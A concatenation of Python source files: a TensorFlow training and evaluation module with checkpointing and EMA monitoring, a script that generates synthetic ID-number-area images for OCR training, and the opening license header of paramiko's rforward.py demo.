    :raises ValueError: when a directory is non-empty and override is False

    Fixes: the loop variable no longer shadows the builtin ``dir``; the
    ValueError now carries a message.
    """
    for directory in [out.save_dir, out.log_dir]:
        if os.path.exists(directory):
            if len(os.listdir(directory)) > 0:
                if not override:
                    raise ValueError(
                        "Directory %s is not empty; pass override=True to clear it" % directory)
                print("Clearing %d files/dirs that already existed in %s" %
                      (len(os.listdir(directory)), directory))
                shutil.rmtree(directory)
                os.makedirs(directory)
        else:
            os.makedirs(directory)
    # JSON config just so we always have a human-readable dump of what we are working with
    with open(join(out.dir, "model.json"), "w") as f:
        f.write(configurable.config_to_json(model, indent=2))
    # Actual model saved via pickle
    with open(join(out.dir, "model.pkl"), "wb") as f:
        pickle.dump(model, f)
# TODO might be nicer to just have a "Trainer" object
class TrainParams(Configurable):
    """ Parameters related to training """
    def __init__(self,
                 opt: SerializableOptimizer,
                 num_epochs: int,
                 eval_period: int,
                 log_period: int,
                 save_period: int,
                 eval_samples: Dict[str, Optional[int]],
                 regularization_weight: Optional[float] = None,
                 async_encoding: Optional[int] = None,
                 max_checkpoints_to_keep: int = 5,
                 loss_ema: Optional[float] = .999,
                 eval_at_zero: bool = False,
                 monitor_ema: float = .999,
                 ema: Optional[float] = None,
                 best_weights: Optional[Tuple[str, str]] = None,
                 monitor_gradients: bool = False,
                 clip_val: Optional[float] = None,
                 clip_norm: Optional[float] = None,
                 lr_decay=None,
                 regularization_lambda: Optional[float] = None,
                 reduce_lr_on_plateau: Optional[ReduceLROnPlateau] = None
                 ):
        """
        :param opt: Optimizer to use
        :param num_epochs: Number of epochs to train for
        :param eval_period: How many batches to train on between evaluations
        :param log_period: How many batches to train on between logging
        :param save_period: How many batches to train on between checkpointing
        :param eval_samples: How many samples to draw during evaluation, None of a full epoch
        :param regularization_weight: How highly to weight regulraization, defaults to 1
        :param async_encoding: Encoding batches in a seperate thread, and store in a queue of this size
        :param max_checkpoints_to_keep: Max number of checkpoints to keep during training
        :param loss_ema: EMA weights for monitoring the loss during training
        :param eval_at_zero: Run an evaluation cycle before any training
        :param monitor_ema: EMA weights for monitor functions
        :param ema: EMA to use on the trainable parameters
        :param best_weights: Store the weights with the highest scores on the given eval dataset/metric
        :param monitor_gradients: Also log gradient norms/histograms to the summaries
        :param clip_val: Clip each gradient element to [-clip_val, clip_val]
        :param clip_norm: Clip gradients by this global norm
        :param lr_decay: Learning-rate decay schedule callable (mutually exclusive with reduce_lr_on_plateau)
        :param regularization_lambda: L2 penalty added over non-bias trainable variables
        :param reduce_lr_on_plateau: ReduceLROnPlateau instance (mutually exclusive with lr_decay)
        """
        self.async_encoding = async_encoding
        self.regularization_weight = regularization_weight
        self.max_checkpoints_to_keep = max_checkpoints_to_keep
        self.opt = opt
        self.eval_at_zero = eval_at_zero
        self.ema = ema
        self.loss_ema = loss_ema
        self.monitor_ema = monitor_ema
        self.num_epochs = num_epochs
        self.eval_period = eval_period
        self.log_period = log_period
        self.save_period = save_period
        self.eval_samples = eval_samples
        self.best_weights = best_weights
        self.monitor_gradients = monitor_gradients
        self.clip_val = clip_val
        self.clip_norm = clip_norm
        self.lr_decay = lr_decay
        self.regularization_lambda = regularization_lambda
        self.reduce_lr_on_plateau = reduce_lr_on_plateau
        if lr_decay is not None and reduce_lr_on_plateau is not None:
            raise ValueError("Choose only one lr schedule")
    def __setstate__(self, state):
        # Backwards compatibility: fill in attributes that older pickled
        # TrainParams objects predate.
        if 'monitor_gradients' not in state:
            state['monitor_gradients'] = False
            state['clip_val'] = None
            state['clip_norm'] = None
        if 'lr_decay' not in state:
            state['lr_decay'] = None
        if 'regularization_lambda' not in state:
            state['regularization_lambda'] = None
        if 'reduce_lr_on_plateau' not in state:
            state['reduce_lr_on_plateau'] = None
        self.__dict__ = state
def save_train_start(out,
                     data: TrainingData,
                     global_step: int,
                     evaluators: List[Evaluator],
                     train_params: TrainParams,
                     notes: str):
    """ Record the training parameters we are about to use into `out` """
    import socket

    if notes is not None:
        with open(join(out, "train_from_%d_notes.txt" % global_step), "w") as f:
            f.write(notes)
    # One record dumped twice: JSON for humans, pickle for reloading.
    record = dict(train_params=train_params,
                  data=data,
                  start_at=global_step,
                  evaluators=evaluators,
                  date=datetime.now().strftime("%m%d-%H%M%S"),
                  host=socket.gethostname())
    with open(join(out, "train_from_%d.json" % global_step), "w") as f:
        f.write(configurable.config_to_json(record, indent=2))
    with open(join(out, "train_from_%d.pkl" % global_step), "wb") as f:
        pickle.dump(record, f)
def _build_train_ops(train_params):
    """Build ops we should run during training, including learning, EMA, and summary ops.

    :param train_params: TrainParams controlling regularization, clipping,
        decay, EMAs and monitoring
    :return: (loss, summary_tensor, train_opt, global_step, ema)
    """
    global_step = tf.get_variable('global_step', shape=[], dtype='int32',
                                  initializer=tf.constant_initializer(0), trainable=False)
    # Total loss = sum of everything the model placed in the LOSSES collection.
    loss = tf.get_collection(tf.GraphKeys.LOSSES)
    if len(loss) == 0:
        raise RuntimeError("No losses found in losses collection")
    loss = tf.add_n(loss, name="loss")
    if len(tf.get_collection(tf.GraphKeys.SUMMARIES)) > 0:
        # Add any summaries client stored in SUMMARIES
        summary_tensor = tf.summary.merge([[tf.summary.tensor_summary("loss", loss)] +
                                           tf.get_collection(tf.GraphKeys.SUMMARIES)])
    else:
        summary_tensor = tf.summary.tensor_summary("loss", loss)
    # # TODO: remove?
    # summary_tensor = tf.summary.merge([tf.summary.tensor_summary("during-training/loss", loss),
    #                                    ])
    train_objective = loss
    # Optional L2 penalty over all non-bias trainable variables.
    if train_params.regularization_lambda is not None:
        vars = tf.trainable_variables()
        l2_loss = tf.add_n([tf.nn.l2_loss(v) for v in vars
                            if 'bias' not in v.name]) * train_params.regularization_lambda
        tf.add_to_collection(tf.GraphKeys.REGULARIZATION_LOSSES, l2_loss)
    regularizers = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
    if len(regularizers) > 0:
        regularization_loss = tf.add_n(regularizers, name="regularization_loss")
        if train_params.regularization_weight is not None:
            train_objective = train_objective + regularization_loss * train_params.regularization_weight
        else:
            train_objective = train_objective + regularization_loss
    else:
        regularization_loss = None
    opt = train_params.opt.get(lr_decay=train_params.lr_decay, global_step=global_step)
    gradients, variables = zip(*opt.compute_gradients(train_objective))
    # Element-wise clipping first, then (optionally) global-norm clipping.
    if train_params.clip_val is not None:
        gradients = [
            None if gradient is None else tf.clip_by_value(gradient, -train_params.clip_val, train_params.clip_val)
            for gradient in gradients]
    if train_params.clip_norm is not None:
        gradients, _ = tf.clip_by_global_norm(gradients, train_params.clip_norm)
    if train_params.monitor_gradients:
        summary_tensor = tf.summary.merge([tf.summary.scalar("training-gradients/global-norm",
                                                             tf.global_norm(gradients)),
                                           summary_tensor])
        # NOTE(review): indexing `variables[idx]` after filtering the None
        # gradients can mispair names and grads when some gradient is None.
        for idx, grad in enumerate([g for g in gradients if g is not None]):
            summary_tensor = tf.summary.merge([tf.summary.histogram(f"gradients/{variables[idx].name}-grad", grad),
                                               summary_tensor])
    train_opt = opt.apply_gradients(zip(gradients, variables), global_step=global_step)
    if train_params.ema is not None:
        ema = tf.train.ExponentialMovingAverage(decay=train_params.ema)
        ema_op = ema.apply(tf.trainable_variables())
        with tf.control_dependencies([train_opt]):
            # Run the old training op, then update the averages.
            train_opt = tf.group(ema_op)
    else:
        ema = None
    # Any collections starting with "monitor" are also added as summaries
    to_monitor = {}
    for col in tf.get_default_graph().get_all_collection_keys():
        if col.startswith("monitor"):
            v = tf.get_collection(col)
            if len(v) > 0:
                print("Monitoring: " + col)
                v = tf.add_n(v)
                to_monitor[col] = v
    if len(to_monitor) > 0:
        monitor_ema = tf.train.ExponentialMovingAverage(decay=train_params.monitor_ema, name="MonitorEMA",
                                                        zero_debias=True)
        train_opt = tf.group(train_opt, monitor_ema.apply(list(to_monitor.values())))
        summary_tensor = tf.summary.merge(
            [tf.summary.scalar(col, monitor_ema.average(v)) for col, v in to_monitor.items()] +
            [summary_tensor])
    # EMA for the loss and what we monitoring
    if train_params.loss_ema is not None:
        loss_ema = tf.train.ExponentialMovingAverage(decay=train_params.loss_ema, name="LossEMA", zero_debias=True)
        if regularization_loss is None:
            ema_op = loss_ema.apply([loss])
            train_opt = tf.group(train_opt, ema_op)
            ema_var = loss_ema.average(loss)
            summary_tensor = tf.summary.merge([tf.summary.scalar("training-ema/loss", ema_var), summary_tensor])
        else:
            # Track loss, full objective and the regularization term separately.
            to_track = [loss, train_objective, regularization_loss]
            ema_op = loss_ema.apply(to_track)
            train_opt = tf.group(train_opt, ema_op)
            tensor_vars = [
                tf.summary.scalar("training-ema/loss", loss_ema.average(loss)),
                tf.summary.scalar("training-ema/objective", loss_ema.average(train_objective)),
                tf.summary.scalar("training-ema/regularization-loss",
                                  loss_ema.average(regularization_loss))
            ]
            summary_tensor = tf.summary.merge([tensor_vars, summary_tensor])
    # lr = train_params.opt.lr_op
    # The 'opt/lr' variable was created by train_params.opt.get() above.
    with tf.variable_scope('opt', reuse=True):
        lr = tf.get_variable('lr')
    summary_tensor = tf.summary.merge([tf.summary.scalar("learning_rate", lr), summary_tensor])
    if train_params.reduce_lr_on_plateau is not None:
        # Must happen after 'opt/lr' exists; wires the plateau callback's ops.
        train_params.reduce_lr_on_plateau.build_ops()
    return loss, summary_tensor, train_opt, global_step, ema
def continue_training(
        data: TrainingData,
        model: Model,
        train_params: TrainParams,
        evaluators: List[Evaluator],
        out: ModelDir,
        notes: str = None,
        dry_run=False):
    """Train an already existing model, or start from scratch.

    Starts fresh when `out.dir` is missing or empty, otherwise resumes
    from the most recent checkpoint.

    Bug fix: the emptiness test compared the ``os.listdir`` list itself
    to 0 (always False), so an existing-but-empty directory was wrongly
    routed to the resume path.
    """
    if not exists(out.dir) or len(os.listdir(out.dir)) == 0:
        start_training(data, model, train_params, evaluators, out, notes, dry_run)
    else:
        print("Files already exist, loading most recent model")
        resume_training_with(data, out, train_params, evaluators, notes, dry_run)
def start_training(
        data: TrainingData,
        model: Model,
        train_params: TrainParams,
        evaluators: List[Evaluator],
        out: ModelDir,
        notes: str = None,
        initialize_from=None,
        dry_run=False,
        save_graph=False):
    """ Train a model from scratch """
    if initialize_from is None:
        # No warm-start checkpoint: run the model's phase-one initialization.
        print("Initializing model at: " + out.dir)
        model.init(data.get_train_corpus(), data.get_resource_loader())
    # Else we assume the model has already completed its first phase of initialization
    if not dry_run:
        init(out, model, False)
    _train(model, data, None, initialize_from, True, train_params,
           evaluators, out, notes, dry_run, save_graph=save_graph)
def resume_training(out: ModelDir, notes: str = None, dry_run=False, start_eval=False, async_encoding=None,
                    dev_batch_size=None):
    """ Resume training an existing model

    Reloads the model, data and parameters recorded by the last run in
    `out`, then continues from the latest checkpoint.

    :raises ValueError: when `out.save_dir` holds no checkpoint
    """
    train_params = out.get_last_train_params()
    model = out.get_model()
    train_data = train_params["data"]
    if dev_batch_size is not None:  # this is an ugly hack for now, to handle batchers with too big a size
        print(f"changing dev batch size from {train_data.dev_batcher.batch_size} to {dev_batch_size}")
        train_data.dev_batcher.batch_size = dev_batch_size
    evaluators = train_params["evaluators"]
    params = train_params["train_params"]
    # NOTE(review): hard-coded override -- resumed runs always train for
    # 72 epochs regardless of what the saved params say; confirm intended.
    params.num_epochs = 24 * 3
    if async_encoding is not None:
        params.async_encoding = async_encoding
    latest = tf.train.latest_checkpoint(out.save_dir)
    if latest is None:
        raise ValueError("No checkpoint to resume from found in " + out.save_dir)
    _train(model, train_data, latest, None, False, params, evaluators, out, notes, dry_run, start_eval)
def start_training_with_params(out: ModelDir, notes: str = None, dry_run=False, start_eval=False):
    """ Train a model with existing parameters etc

    Like resume_training(), but starts from freshly initialized weights
    (no checkpoint is loaded).
    """
    train_params = out.get_last_train_params()
    model = out.get_model()
    train_data = train_params["data"]
    evaluators = train_params["evaluators"]
    params = train_params["train_params"]
    # NOTE(review): same hard-coded 72-epoch override as resume_training().
    params.num_epochs = 24 * 3
    _train(model, train_data, None, None, False, params, evaluators, out, notes, dry_run, start_eval)
def resume_training_with(
        data: TrainingData,
        out: ModelDir,
        train_params: TrainParams,
        evaluators: List[Evaluator],
        notes: str = None,
        dry_run: bool = False,
        start_eval=False):
    """ Resume training an existing model with the specified parameters """
    # The pickled model is authoritative; JSON is only a human-readable copy.
    with open(join(out.dir, "model.pkl"), "rb") as f:
        model = pickle.load(f)
    checkpoint = out.get_latest_checkpoint()
    if checkpoint is None:
        raise ValueError("No checkpoint to resume from found in " + out.save_dir)
    print(f"Loaded checkpoint from {out.save_dir}")
    _train(model, data, checkpoint, None, False, train_params,
           evaluators, out, notes, dry_run, start_eval=start_eval)
def _train(model: Model,
           data: TrainingData,
           checkpoint: Union[str, None],
           parameter_checkpoint: Union[str, None],
           save_start: bool,
           train_params: TrainParams,
           evaluators: List[Evaluator],
           out: ModelDir,
           notes=None,
           dry_run=False,
           start_eval=False,
           save_graph=False):
    """Synchronous (feed_dict based) training loop.

    Builds the model against `data`, restores state from `checkpoint`
    (full training state) or `parameter_checkpoint` (trainable parameters
    only), then trains for `train_params.num_epochs` epochs with periodic
    summary logging, checkpointing and evaluation.

    Fixes: removed a stray `return` after restoring `checkpoint` (it made
    resuming training a no-op); `dry_run` now skips the training loop, as
    it already did in `_train_async`; eval-loop variables no longer shadow
    the `data` parameter; `vars` renamed to avoid shadowing the builtin.
    """
    if train_params.async_encoding:
        # Queue-based trainer handles this mode entirely
        _train_async(model, data, checkpoint, parameter_checkpoint, save_start, train_params,
                     evaluators, out, notes, dry_run, start_eval, save_graph=save_graph)
        return
    if train_params.best_weights is not None:
        # best-weights tracking is only implemented in the async path
        raise NotImplementedError

    # spec the model for the current voc/input/batching
    train = data.get_train()
    eval_datasets = data.get_eval()
    loader = data.get_resource_loader()
    evaluator_runner = EvaluatorRunner(evaluators, model)

    print("Training on %d batches" % len(train))
    print("Evaluation datasets: " + " ".join("%s (%d)" % (name, len(ds)) for name, ds in eval_datasets.items()))

    print("Init model...")
    model.set_inputs([train] + list(eval_datasets.values()), loader)

    print("Setting up model prediction / tf...")
    sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
    with sess.as_default():
        pred = model.get_prediction()
    evaluator_runner.set_input(pred)

    if parameter_checkpoint is not None:
        # Restore only the trainable parameters (e.g. fine-tuning another run)
        print("Restoring parameters from %s" % parameter_checkpoint)
        saver = tf.train.Saver(tf.trainable_variables())
        saver.restore(sess, parameter_checkpoint)
        saver = None

    loss, summary_tensor, train_opt, global_step, _ = _build_train_ops(train_params)

    # Pre-compute tensors we need at evaluations time
    eval_tensors = []
    for ev in evaluators:
        eval_tensors.append(ev.tensors_needed(pred))

    saver = tf.train.Saver(max_to_keep=train_params.max_checkpoints_to_keep)
    summary_writer = tf.summary.FileWriter(out.log_dir)

    # Load or initialize the model parameters
    if checkpoint is not None:
        print("Restoring training from checkpoint...")
        saver.restore(sess, checkpoint)
        print("Loaded checkpoint: " + str(sess.run(global_step)))
        # (a stray `return` here previously aborted resumed training)
    else:
        if parameter_checkpoint is not None:
            # Trainable vars were restored above; initialize only the rest
            print("Initializing training variables...")
            non_trainable = [x for x in tf.global_variables()
                             if x not in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)]
            sess.run(tf.variables_initializer(non_trainable))
        else:
            print("Initializing parameters...")
            sess.run(tf.global_variables_initializer())

    # Initialize the ELMo token embeddings, if this model uses them
    try:
        if model.use_elmo and model.token_lookup:
            elmo_token_embed_placeholder, elmo_token_embed_init = model.get_elmo_token_embed_ph_and_op()
            print("Loading ELMo weights...")
            elmo_token_embed_weights = load_elmo_pretrained_token_embeddings(model.lm_model.embed_weights_file)
            sess.run(elmo_token_embed_init, feed_dict={elmo_token_embed_placeholder: elmo_token_embed_weights})
    except (AttributeError, NotImplementedError):
        # Model has no ELMo support; nothing to initialize
        pass

    # Make sure no bugs occur that add to the graph in the train loop, that can cause (eventually) OOMs
    tf.get_default_graph().finalize()

    if save_graph:
        summary_writer.add_graph(sess.graph)

    if dry_run:
        # Everything is built and initialized; skip the actual training
        return

    print("Start training!")

    on_step = sess.run(global_step)
    if save_start:
        summary_writer.add_graph(sess.graph, global_step=on_step)
        save_train_start(out.dir, data, on_step, evaluators, train_params, notes)

    if train_params.eval_at_zero:
        print("Running evaluation...")
        start_eval = False
        for name, eval_data in eval_datasets.items():
            n_samples = train_params.eval_samples.get(name)
            evaluation = evaluator_runner.run_evaluators(sess, eval_data, name, n_samples)
            for s in evaluation.to_summaries(name + "-"):
                summary_writer.add_summary(s, on_step)

    batch_time = 0
    for epoch in range(train_params.num_epochs):
        for batch_ix, batch in enumerate(train.get_epoch()):
            t0 = time.perf_counter()
            on_step = sess.run(global_step) + 1  # +1 because all calculations are done after step
            get_summary = on_step % train_params.log_period == 0
            encoded = model.encode(batch, True)

            if get_summary:
                summary, _, batch_loss = sess.run([summary_tensor, train_opt, loss], feed_dict=encoded)
            else:
                summary = None
                _, batch_loss = sess.run([train_opt, loss], feed_dict=encoded)

            if np.isnan(batch_loss):
                raise RuntimeError("NaN loss!")

            batch_time += time.perf_counter() - t0
            if get_summary:
                print("on epoch=%d batch=%d step=%d time=%.3f" %
                      (epoch, batch_ix + 1, on_step, batch_time))
                summary_writer.add_summary(tf.Summary(value=[tf.Summary.Value(tag="time", simple_value=batch_time)]),
                                           on_step)
                summary_writer.add_summary(summary, on_step)
                batch_time = 0

            # occasional saving
            if on_step % train_params.save_period == 0:
                print("Checkpointing")
                saver.save(sess, join(out.save_dir, "checkpoint-" + str(on_step)), global_step=global_step)

            # Occasional evaluation
            if (on_step % train_params.eval_period == 0) or start_eval:
                print("Running evaluation...")
                start_eval = False
                t0 = time.perf_counter()
                for name, eval_data in eval_datasets.items():
                    n_samples = train_params.eval_samples.get(name)
                    evaluation = evaluator_runner.run_evaluators(sess, eval_data, name, n_samples)
                    for s in evaluation.to_summaries(name + "-"):
                        summary_writer.add_summary(s, on_step)
                print("Evaluation took: %.3f seconds" % (time.perf_counter() - t0))

    # Final checkpoint; relpath keeps the stored checkpoint path relative
    saver.save(sess, relpath(join(out.save_dir, "checkpoint-" + str(on_step))), global_step=global_step)
    sess.close()
def _train_async(model: Model,
                 data: TrainingData,
                 checkpoint: Union[str, None],
                 parameter_checkpoint: Union[str, None],
                 save_start: bool,
                 train_params: TrainParams,
                 evaluators: List[Evaluator],
                 out: ModelDir,
                 notes=None,
                 dry_run=False,
                 start_eval=False,
                 save_graph=False):
    """Train while encoding batches on a separate thread and storing them in a
    tensorflow Queue; can be much faster than using the feed_dict approach.

    Fixes: restoring from `parameter_checkpoint` previously restored from
    `checkpoint` by mistake; the EMA-variable collection loop appended to the
    list it was iterating over (now iterates a snapshot); typos corrected.
    """
    print("Loading train data...")
    train = data.get_train()
    print("Loading dev data...")
    eval_datasets = data.get_eval()
    loader = data.get_resource_loader()
    print("Training on %d batches" % len(train))
    print("Evaluation datasets: " + " ".join("%s (%d)" % (name, len(ds)) for name, ds in eval_datasets.items()))

    # spec the model for the given datasets
    model.set_inputs([train] + list(eval_datasets.values()), loader)
    placeholders = model.get_placeholders()

    train_queue = tf.FIFOQueue(train_params.async_encoding, [x.dtype for x in placeholders], name="train_queue")
    evaluator_runner = AysncEvaluatorRunner(evaluators, model, train_params.async_encoding)
    train_enqueue = train_queue.enqueue(placeholders)
    train_close = train_queue.close(True)

    # Route batches from either the train queue or the eval queue
    is_train = tf.placeholder(tf.bool, ())
    input_tensors = tf.cond(is_train, lambda: train_queue.dequeue(),
                            lambda: evaluator_runner.eval_queue.dequeue())

    # tensorflow can't infer the shape for an unsized queue, so set it manually
    for input_tensor, pl in zip(input_tensors, placeholders):
        input_tensor.set_shape(pl.shape)

    print("Init model...")
    sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
    with sess.as_default():
        pred = model.get_predictions_for(dict(zip(placeholders, input_tensors)))
    evaluator_runner.set_input(pred)

    if parameter_checkpoint is not None:
        print("Restoring parameters from %s" % parameter_checkpoint)
        saver = tf.train.Saver()
        # Bug fix: this previously restored from `checkpoint`, silently
        # ignoring the requested parameter checkpoint
        saver.restore(sess, parameter_checkpoint)
        saver = None

    print("Setting up model prediction / tf...")
    all_vars = tf.global_variables()
    loss, summary_tensor, train_opt, global_step, weight_ema = _build_train_ops(train_params)

    # Pre-compute tensors we need at evaluations time
    eval_tensors = []
    for ev in evaluators:
        eval_tensors.append(ev.tensors_needed(pred))

    if train_params.best_weights is not None:
        lst = all_vars
        if weight_ema is not None:
            # Iterate a snapshot: appending to `lst` while iterating it would
            # also visit the EMA variables we just added
            for x in list(lst):
                v = weight_ema.average(x)
                if v is not None:
                    lst.append(v)
        best_weight_saver = tf.train.Saver(var_list=lst, max_to_keep=1)
        cur_best = None
    else:
        best_weight_saver = None
        cur_best = None

    saver = tf.train.Saver(max_to_keep=train_params.max_checkpoints_to_keep)
    summary_writer = tf.summary.FileWriter(out.log_dir)

    # Load or initialize the model parameters
    if checkpoint is not None:
        print("Restoring from checkpoint...")
        saver.restore(sess, checkpoint)
        print("Loaded checkpoint: " + str(sess.run(global_step)))
    else:
        print("Initializing parameters...")
        sess.run(tf.global_variables_initializer())

    # Initialize the ELMo token embeddings, if this model uses them
    try:
        if model.use_elmo and model.token_lookup:
            elmo_token_embed_placeholder, elmo_token_embed_init = model.get_elmo_token_embed_ph_and_op()
            print("Loading ELMo weights...")
            elmo_token_embed_weights = load_elmo_pretrained_token_embeddings(model.lm_model.embed_weights_file)
            sess.run(elmo_token_embed_init, feed_dict={elmo_token_embed_placeholder: elmo_token_embed_weights})
    except (AttributeError, NotImplementedError):
        pass

    # Make sure no bugs occur that add to the graph in the train loop, that can cause (eventually) OOMs
    tf.get_default_graph().finalize()

    if save_graph:
        summary_writer.add_graph(sess.graph)

    if dry_run:
        return

    on_step = sess.run(global_step)

    if save_start:
        # summary_writer.add_graph(sess.graph, global_step=on_step)
        save_train_start(out.dir, data, sess.run(global_step), evaluators, train_params, notes)

    def enqueue_train():
        """Producer thread: dataset iterator -> encoder -> train queue."""
        try:
            for _ in range(train_params.num_epochs):
                for batch in train.get_epoch():
                    feed_dict = model.encode(batch, True)
                    sess.run(train_enqueue, feed_dict)
        except tf.errors.CancelledError:
            # The queue_close operator has been called, exit gracefully
            return
        except Exception as e:
            # Crashes the main thread with a queue exception
            sess.run(train_close)
            raise e

    train_enqueue_thread = Thread(target=enqueue_train)
    train_enqueue_thread.daemon = True  # Ensure we exit the program on an exception

    print("Start training!")

    batch_time = 0
    train_dict = {is_train: True}
    eval_dict = {is_train: False}
    terminate = False
    try:
        train_enqueue_thread.start()

        for epoch in range(train_params.num_epochs):
            if terminate:
                print("Stopping because of learning rate termination")
                break
            for batch_ix in range(len(train)):
                t0 = time.perf_counter()
                on_step = sess.run(global_step) + 1
                get_summary = on_step % train_params.log_period == 0

                if get_summary:
                    summary, _, batch_loss = sess.run([summary_tensor, train_opt, loss], feed_dict=train_dict)
                else:
                    summary = None
                    _, batch_loss = sess.run([train_opt, loss], feed_dict=train_dict)

                if np.isnan(batch_loss):
                    raise RuntimeError("NaN loss!")

                batch_time += time.perf_counter() - t0
                if summary is not None:
                    print("on epoch=%d batch=%d step=%d, time=%.3f" %
                          (epoch, batch_ix + 1, on_step, batch_time))
                    summary_writer.add_summary(
                        tf.Summary(value=[tf.Summary.Value(tag="time", simple_value=batch_time)]), on_step)
                    summary_writer.add_summary(summary, on_step)
                    batch_time = 0

                # occasional saving
                if on_step % train_params.save_period == 0:
                    print("Checkpointing")
                    saver.save(sess, join(out.save_dir, "checkpoint-" + str(on_step)), global_step=global_step)

                # Occasional evaluation
                if (on_step % train_params.eval_period == 0) or start_eval:
                    print("Running evaluation...")
                    start_eval = False
                    t0 = time.perf_counter()
                    for name, eval_data in eval_datasets.items():
                        n_samples = train_params.eval_samples.get(name)
                        evaluation = evaluator_runner.run_evaluators(sess, eval_data, name, n_samples, eval_dict)
                        for s in evaluation.to_summaries(name + "-"):
                            summary_writer.add_summary(s, on_step)

                        # Maybe save as the best weights
                        if train_params.best_weights is not None and name == train_params.best_weights[0]:
                            val = evaluation.scalars[train_params.best_weights[1]]
                            if cur_best is None or val > cur_best:
                                print("Save weights with current best weights (%s vs %.5f)" % (
                                    "None" if cur_best is None else ("%.5f" % cur_best), val))
                                best_weight_saver.save(sess, join(out.best_weight_dir, "best"),
                                                       global_step=global_step)
                                cur_best = val

                        if train_params.reduce_lr_on_plateau is not None \
                                and name == train_params.reduce_lr_on_plateau.dev_name:
                            train_params.reduce_lr_on_plateau(
                                updated_scalar_value=evaluation.scalars[train_params.reduce_lr_on_plateau.scalar_name],
                                sess=sess)

                    print("Evaluation took: %.3f seconds" % (time.perf_counter() - t0))
                    if train_params.reduce_lr_on_plateau is not None:
                        if train_params.reduce_lr_on_plateau.terminate(sess):
                            terminate = True
                            break
    finally:
        sess.run(train_close)  # terminates the enqueue thread with an exception
        train_enqueue_thread.join()

    saver.save(sess, relpath(join(out.save_dir, "checkpoint-" + str(on_step))), global_step=global_step)
    sess.close()
def test(model: Model, evaluators, datasets: Dict[str, Dataset], loader, checkpoint,
         ema=True, aysnc_encoding=None, sample=None) -> Dict[str, Evaluation]:
    """Evaluate a restored model on each dataset, returning one Evaluation per name.

    If `ema` is truthy, EMA-averaged variables found in the checkpoint are
    restored over the plain variables. `aysnc_encoding` (sic) switches to the
    queue-based evaluator with that queue capacity; `sample` limits the number
    of examples evaluated per dataset.
    """
    print("Setting up model")
    model.set_inputs(list(datasets.values()), loader)
    if aysnc_encoding:
        evaluator_runner = AysncEvaluatorRunner(evaluators, model, aysnc_encoding)
        inputs = evaluator_runner.dequeue_op
    else:
        evaluator_runner = EvaluatorRunner(evaluators, model)
        inputs = model.get_placeholders()
    input_dict = {p: x for p, x in zip(model.get_placeholders(), inputs)}
    sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
    with sess.as_default():
        pred = model.get_predictions_for(input_dict)
    evaluator_runner.set_input(pred)
    print("Restoring variables")
    saver = tf.train.Saver()
    saver.restore(sess, checkpoint)
    if ema:
        # FIXME This is a bit stupid, since we are loading variables twice, but I found it
        # a bit fiddly to load the variables directly....
        ema = tf.train.ExponentialMovingAverage(0)
        reader = tf.train.NewCheckpointReader(checkpoint)
        expected_ema_names = {ema.average_name(x): x for x in tf.trainable_variables()
                              if reader.has_tensor(ema.average_name(x))}
        if len(expected_ema_names) > 0:
            print("Restoring EMA variables")
            saver = tf.train.Saver(expected_ema_names)
            saver.restore(sess, checkpoint)
    # Initialize ELMo token embeddings if the model uses them
    try:
        if model.use_elmo and model.token_lookup:
            elmo_token_embed_placeholder, elmo_token_embed_init = model.get_elmo_token_embed_ph_and_op()
            print("Loading ELMo weights...")
            elmo_token_embed_weights = load_elmo_pretrained_token_embeddings(model.lm_model.embed_weights_file)
            sess.run(elmo_token_embed_init, feed_dict={elmo_token_embed_placeholder: elmo_token_embed_weights})
    except (AttributeError, NotImplementedError) as e:
        pass
    # Freeze the graph so evaluation cannot accidentally add nodes
    tf.get_default_graph().finalize()
    print("Begin evaluation")
    dataset_outputs = {}
    for name, dataset in datasets.items():
        dataset_outputs[name] = evaluator_runner.run_evaluators(sess, dataset, name, sample, {})
    return dataset_outputs
|
chinese_idcard_number_area_generator.py | # -*- coding: utf-8 -*-
'''
模拟生成一组身份证号码区域图片,用来训练神经网络。
'''
import threading
import os
import shutil
import random
from PIL import Image, ImageDraw, ImageFont, ImageEnhance
COUNT = range(0, 500)  # number of images to generate (one worker thread each)
OUT_PATH = './generatedNumberAreaImages'  # output directory, recreated on every run
LABELS = '0123456789X'  # character set drawn onto every image (ID-card digits)
def start():
    '''
    Generate the training images:
    1. Clear (and recreate) the output directory
    2. Spawn one thread per image for speed
    '''
    if os.path.exists(OUT_PATH):
        shutil.rmtree(OUT_PATH)
    os.mkdir(OUT_PATH)
    for idx in COUNT:
        # args=([idx]) is a one-element list, equivalent to args=(idx,)
        new_thread = threading.Thread(target=create_image, args=([idx]))
        new_thread.start()
def create_image(idx):
    '''
    1. Load the background image from the `resources` directory
    2. Draw the label characters onto it with random position, font size,
       color/brightness/contrast/sharpness jitter and a small rotation,
       then save as OUT_PATH/<idx>.png
    '''
    o_image = Image.open('./resources/background.png')
    draw_brush = ImageDraw.Draw(o_image)
    font_size = random.randint(-5, 5) + 35
    draw_brush.text((10 + random.randint(-10, 10), 15 + random.randint(-2, 2)), LABELS,
                    fill='black',
                    font=ImageFont.truetype('./resources/OCR-B 10 BT.ttf', font_size))
    o_image = ImageEnhance.Color(o_image).enhance(
        random.uniform(0.5, 1.5))  # color saturation
    o_image = ImageEnhance.Brightness(o_image).enhance(
        random.uniform(0.5, 1.5))  # brightness
    o_image = ImageEnhance.Contrast(o_image).enhance(
        random.uniform(0.5, 1.5))  # contrast
    o_image = ImageEnhance.Sharpness(o_image).enhance(
        random.uniform(0.5, 1.5))  # sharpness
    o_image = o_image.rotate(random.randint(-2, 2))
    o_image.save(OUT_PATH + '/%d.png' % idx)
if __name__ == '__main__':
start()
|
rforward.py | #!/usr/bin/env python
# Copyright (C) 2008 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
